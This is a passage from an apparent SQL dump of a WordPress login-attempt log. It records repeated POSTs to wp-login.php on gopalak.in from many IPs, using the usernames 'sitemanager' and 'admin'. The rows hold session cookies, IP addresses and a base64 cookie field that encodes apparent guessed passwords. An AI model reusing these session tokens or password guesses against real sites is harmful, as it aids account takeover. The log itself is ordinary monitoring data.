17:17:18'),(93812,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7YWJjZGVm\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976832.741112;s:12:\"REQUEST_TIME\";i:1744976832;}}','146.59.227.21',1,'2025-04-18 17:17:14','2025-04-19 17:17:18'),(93813,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"82\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7bTFtMm0zbTQ%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"82\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976834.5628641;s:12:\"REQUEST_TIME\";i:1744976834;}}','146.59.227.21',1,'2025-04-18 17:17:16','2025-04-19 17:17:18'),(93814,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7cWF6eHN3MTIz\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976836.395277;s:12:\"REQUEST_TIME\";i:1744976836;}}','146.59.227.21',1,'2025-04-18 17:17:18','2025-04-19 17:17:18'),(93815,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51588\";s:11:\"REMOTE_ADDR\";s:14:\"15.188.117.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744977150.0924549;s:12:\"REQUEST_TIME\";i:1744977150;}}','15.188.117.207',0,'2025-04-18 17:22:31','1970-01-01 00:00:00'),(93816,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57970\";s:11:\"REMOTE_ADDR\";s:13:\"68.178.145.83\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744977835.273469;s:12:\"REQUEST_TIME\";i:1744977835;}}','68.178.145.83',0,'2025-04-18 17:33:57','1970-01-01 00:00:00'),(93817,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58786\";s:11:\"REMOTE_ADDR\";s:12:\"103.132.20.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744978541.0250821;s:12:\"REQUEST_TIME\";i:1744978541;}}','103.132.20.2',0,'2025-04-18 17:45:42','1970-01-01 00:00:00'),(93818,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40508\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744979244.3034279;s:12:\"REQUEST_TIME\";i:1744979244;}}','162.0.232.248',0,'2025-04-18 17:57:26','1970-01-01 00:00:00'),(93819,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37016\";s:11:\"REMOTE_ADDR\";s:14:\"66.102.133.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744979948.8803921;s:12:\"REQUEST_TIME\";i:1744979948;}}','66.102.133.111',0,'2025-04-18 18:09:10','1970-01-01 00:00:00'),(93820,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57244\";s:11:\"REMOTE_ADDR\";s:11:\"23.94.181.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744980655.258435;s:12:\"REQUEST_TIME\";i:1744980655;}}','23.94.181.5',0,'2025-04-18 18:20:57','1970-01-01 00:00:00'),(93821,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36646\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744981359.008029;s:12:\"REQUEST_TIME\";i:1744981359;}}','198.54.126.68',0,'2025-04-18 18:32:40','1970-01-01 00:00:00'),(93822,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, 